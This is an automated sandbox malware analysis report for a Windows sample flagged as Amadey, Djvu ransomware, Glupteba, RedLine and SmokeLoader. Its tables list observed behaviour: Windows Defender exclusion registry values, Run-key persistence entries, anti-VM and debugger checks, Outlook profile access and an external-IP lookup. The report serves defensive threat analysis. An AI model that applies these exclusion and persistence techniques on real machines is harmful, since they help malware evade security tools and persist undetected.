Malware Analysis Report

2025-01-18 05:07

Sample ID 231017-vbnvaafe62
Target NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe
SHA256 2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900
Tags
amadey djvu glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor collection discovery dropper evasion infostealer loader persistence ransomware themida trojan pub1 upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900

Threat Level: Known bad

The file NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe was found to be: Known bad.

Malicious Activity Summary


RedLine

Amadey

Djvu Ransomware

Windows security bypass

SmokeLoader

Glupteba

Detected Djvu ransomware

Glupteba payload

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Themida packer

UPX packed file

Modifies file permissions

Checks BIOS information in registry

Executes dropped EXE

Deletes itself

Loads dropped DLL

Windows security modification

Checks whether UAC is enabled

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-17 16:49

Signatures

Unsigned PE

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-17 16:49

Reported

2023-10-17 16:55

Platform

win7-20230831-en

Max time kernel

118s

Max time network

171s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

RedLine

infostealer redline

RedLine payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4272.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\159.exe | N/A |

Downloads MZ/PE file

Modifies Windows Firewall

evasion

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |

Checks BIOS information in registry

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\159.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\159.exe | N/A |

Deletes itself

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Modifies file permissions

discovery

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |

Themida packer

themida

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Windows security modification

evasion trojan

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4272.exe = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Accesses Microsoft Outlook profiles

collection

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A |

Adds Run key to start application

persistence

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\727fb0f1-09ae-4421-a570-c84a25e4aa61\\FD04.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\FD04.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Checks whether UAC is enabled

evasion trojan

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\159.exe | N/A |

Looks up external IP address via web service

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |

Suspicious use of NtSetInformationThreadHideFromDebugger

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\159.exe | N/A |

Checks for VirtualBox DLLs, possible anti-VM trick

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Drops file in Windows directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Enumerates physical storage devices

Checks SCSI registry key(s)

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe | N/A |

Creates scheduled task(s)

persistence

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |

Modifies data under HKEY_USERS

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
